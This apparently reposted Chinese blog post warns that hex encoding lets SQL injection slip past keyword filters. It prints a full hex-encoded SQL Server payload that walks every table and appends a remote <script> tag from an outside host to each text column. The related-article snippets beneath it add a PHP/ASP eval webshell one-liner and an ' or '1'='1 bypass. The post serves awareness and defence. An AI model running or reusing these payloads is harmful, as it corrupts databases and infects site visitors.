警惕采用编码过的SQL恶意注入

最新推荐文章于 2022-02-18 15:44:36 发布
最新推荐文章于 2022-02-18 15:44:36 发布
阅读量948 收藏
点赞数
分类专栏: HTML+CSS+JavaScript 文章标签: sql table c sql server 脚本

警惕采用编码过的SQL恶意注入 (转自:http://www.cnblogs.com/micheng11/archive/2009/07/29/1533876.html) 现在很多网站发现SQL注入攻击,黑客把SQL语句转换成了16进制后就可以逃避我们平时很多的防注入检测了声明了个 @s,使用了编码的方式把sql语句变成一大串“乱七八糟”(16进制)的东西,然后通过exec可以执行“动态”SQL的特性运行脚本。还逃避了对关键字字符串的检查。一般来说最终注入代码都类似于如下片段(SQL Server 2000/2005):dEcLaRe @s vArChAr(8000) sEt @s=0x4465636c617265204054205661726368617228323535292c4043205661726368617228323535290d0a4465636c617265205461626c655f437572736f7220437572736f7220466f722053656c65637420412e4e616d652c422e4e616d652046726f6d205379736f626a6563747320412c537973636f6c756d6e73204220576865726520412e49643d422e496420416e6420412e58747970653d27752720416e642028422e58747970653d3939204f7220422e58747970653d3335204f7220422e58747970653d323331204f7220422e58747970653d31363729204f70656e205461626c655f437572736f72204665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c4043205768696c6528404046657463685f5374617475733d302920426567696e20457865632827757064617465205b272b40542b275d20536574205b272b40432b275d3d527472696d28436f6e7665727428566172636861722838303030292c5b272b40432b275d29292b27273c736372697074207372633d687474703a2f2f386638656c336c2e636e2f302e6a733e3c2f7363726970743e272727294665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c404320456e6420436c6f7365205461626c655f437572736f72204465616c6c6f63617465205461626c655f437572736f72 eXeC(@s);-- 到SQL后台执行时就是下面语句(可以在SQL查询窗口把上面语句最后的 exec(@s);改成 select @s试试看,结果就是下面语句): Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''''')Fetch Next From Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor可以看出这种SQL注入就是利用表名sysobjects,syscolumns这两个系统表来进行遍历的。运行后库中的每个表的每条记录都会加上这段脚本,脚本内容是这样的document.writeln(" "); document.writeln("

 

 

----------------------------------------------------------------------------------------------------------------------------------------------------

       销售聚才空压机--有需要请点击“龙华空压机http://china.nowec.com/supply/detail/14644381.html

       1.深圳龙华空压机维修保养 ,2。龙华空压机销售维修保养

-----------------------------------------------------------------------------------------------------------------------------------------------------

 

jakecool123
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Web安全之SQL注入攻击
chuangzaoshi7163的博客
08-12 1118
什么是SQL注入式攻击? 所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入式攻击。常见的...
Web—SQL注入攻击
weixin_43916678的博客
11-05 1569
SQL注入概念 SQL注入是指攻击者通过注入恶意SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表,从而实现将两个表的查询组合到一起,使用谓词为UNION或UNION ALL。 联合查询的利用前提:页面有显示位 联合注入的过程:判断注入点、判断是整型还是字符型、判断查询列数、判断显示位、获取所有数据库名、获取数据库所有表名、获取字段名、获取字段中的数据 常规思路 判断是否存在注入. 字符型1’ and ‘
mysql注入漏洞语句,web安全之sql注入漏洞
weixin_32336149的博客
03-18 159
概念通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令。通俗地讲,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。注入流程简介注入流程寻找注入点,构建特殊的数据库查询语句系统页面可注入参数的地...
SQL注入1:针对字符串类型输入的注入
weixin_39562270的博客
10-27 1775
SQL注入(1) 目录 SQL注入 1 目录 1 1 注入思路 1 2 DVWA SQL injectiong 1 2.1 LOW LEVEL(低难度) 1 2.2 探查SQL注入 1 2.2.1 字符串数据 1 2.2.1.1 方法1:输入单引号会导致错误;输入双引号没有异常(因为’’是单引号的转义形式)说明此处 极有可能存在输入为字符串类型的SQL注入。 1 2.2.1.2 方法2:利用逻辑运...
关于SQL指令植入式攻击的危害与防范措施
cuanji3287的博客
01-12 117
什么是SQL 指令植入式攻击?   在设计或者维护Web网站时,你也许担心它们会受到某些卑鄙用户的恶意攻击。的确,如今的Web网站开发者们针对其站点所在操作系统平台或Web 服务器的安全性而展开的讨论实在太多了。不错,IIS ...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
sql.rar_sql注入_恶意代码
09-19
批量替换数据库中的字符串,比如sql server中被注入恶意代码,可批量替换!
信息安全_安全编码SQL注入.pptx
08-14
SQL语法与注入原理 SQLMap安装使用 代码审计实用技巧 PHP安全编码实践
解析:清除SQL注入恶意病毒代码的语句
09-10
本篇文章是对清除SQL注入恶意病毒代码的语句进行了详细的分析介绍,需要的朋友参考下
SQL注入绕过实战案例
08-31
SQL sqli-labs-master 靶场搭建
Java程序员从笨鸟到菜鸟之(一百零一)sql注入攻击详解(二)sql注入过程详解...
红太阳照大地
10-25 236
在上篇博客中我们分析了sql注入的原理,今天我们就来看一下sql注入的整体过程,也就是说如何进行sql注入,由于本人数据库和网络方面知识有限,此文章是对网上大量同类文章的分析与总结,其中有不少直接引用,参考文章太多,没有注意出处,请原作者见谅) SQL注入攻击的总体思路是: 1.发现SQL注入位置; 2.判断后台数据库类型; 3.确定XP_CMDSHELL可执行...
sql写入恶意代码
weixin_48800344的博客
09-01 659
就是通过sql Inject漏洞写入恶意代码 一句话木马 php: <?php @eval($_POST['mxh']);?> asp: <%eval request(“mxh”)%> 里面’’ “” 又是一个新问题,hhh,不过经过研究了解了 select 1,2 into outfile “/var/www/html/1.php” **作用详解:**into outfile 将select 的结果写入到指定目录的文件中,然后访问获取权限,例如菜刀… 条件: 1.需要知道远程目
SQL指令植入式攻击的危害及其防范措施
weixin_30656145的博客
01-17 77
在设计或者维护Web网站时,你也许担心它们会受到某些卑鄙用户的恶意攻击。的确,如今的Web网站开发者们针对其站点所在操作系统平台或Web 服务器的安全性而展开的讨论实在太多了。不错,IIS 服务器的安全漏洞可能招致恶意攻击;但你的安全检查清单不应该仅仅有 IIS 安全性这一条。有些代码,它们通常是专门为数据驱动(data-driven) 的 Web 网站而设计的,实际上往往同其它IIS漏洞一样存在...
安全攻防六:SQL注入,明明设置了强密码,为什么还会被别人登录
运维大湿兄的博客
04-11 1281
在正文之前,让我们先来看一个案例。某天,当你在查看应用的管理后台时,发现有很多异常的操作。接着,你很快反应过来了,这应该是黑客成功登录了管理员账户。于是,你立刻找到管理员,责问他是不是设置了弱密码。管理员很无辜地表示,自己的密码非常复杂,不可能泄漏,但是为了安全起见,他还是立即修改了当前的密码。奇怪的是,第二天,黑客还是能够继续登录管理员账号。问题来了,黑客究竟是怎么做到的呢?你觉得这里面的问题究...
SQL注入漏洞
夜行者的博客
02-18 2008
SQL注入漏洞就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串中,最终达到欺骗服务器执行恶意SQL命令。 SQL注入漏洞产生需要满足两个条件: 1)参数用户可控:前端传给后端的参数内容是用户可以控制的; 2)参数带入数据库查询:传入的参数拼接到SQL语句,且带入数据库查询。 SQL注入漏洞会导致数据库信息泄露、网页篡改(登陆后台后发布恶意内容)、网站挂马(当拿到webshell时或者获取到服务器的权限以后,可将一些网页木马挂在服务器上,去攻击别人)、私自添加系统账号、读..
常规技术面试题(数据库)
高瑜的博客
05-14 4130
21. 对一个投入使用的在线事务处理表格有过多索引需要有什么样的性能考虑? 对一个表格的索引越多,数据库引擎用来更新、插入或者删除数据所需要的时间就越多,因为在数据操控发生的时候索引也必须要维护。 22. 你可以用什么来确保表格里的字段只接受特定范围里的值? 可以使用Check约束,它在数据库表格里定义,用来限制输入该列的值。 触发器也可以被用来限制数据库表格里的字段能够接受的值,但是这种办法要求触发器在表格里被定义,可能会在某些情况下影响到性能。 23. 概述存储过程及其优缺点。 存储过程是一个预编译的s
基本的恶义SQL语法以及防止SQL注入
山鬼谣弋痕夕的博客
05-08 514
https://zhidao.baidu.com/question/1830066056591493380.html恶义 SQL 语法String sql = "select * from tb_name where name= '"+varname+"' and passwd='"+varpasswd+"'";如果我们把 [' or '1' = '1] 作为 varpasswd 传入进来 . 用...
sql注入url编码
最新发布
04-01
SQL注入是一种常见的安全漏洞,攻击者通过在用户输入的数据中插入恶意SQL代码,从而可以执行未经授权的数据库操作。URL编码是一种将特殊字符转换为URL安全格式的方法,以防止URL中出现非法字符。在SQL注入中,攻击者可能会使用URL编码来绕过输入过滤和防御机制。 URL编码使用百分号(%)后跟两位十六进制数来表示特殊字符。例如,空格字符(ASCII码为32)在URL编码中表示为"%20"。攻击者可以使用URL编码来混淆恶意SQL代码,使其在输入过滤时不被检测到。 举个例子,假设有一个登录页面,用户输入用户名和密码进行登录。如果开发者没有对用户输入进行充分验证和过滤,攻击者可以在用户名或密码字段中插入恶意SQL代码。例如,攻击者可以将用户名字段设置为: admin' OR '1'='1 这样的恶意代码可能会导致整个数据库被泄露。为了防止这种情况发生,开发者应该对用户输入进行严格的验证和过滤,并使用参数化查询或预编译语句来防止SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值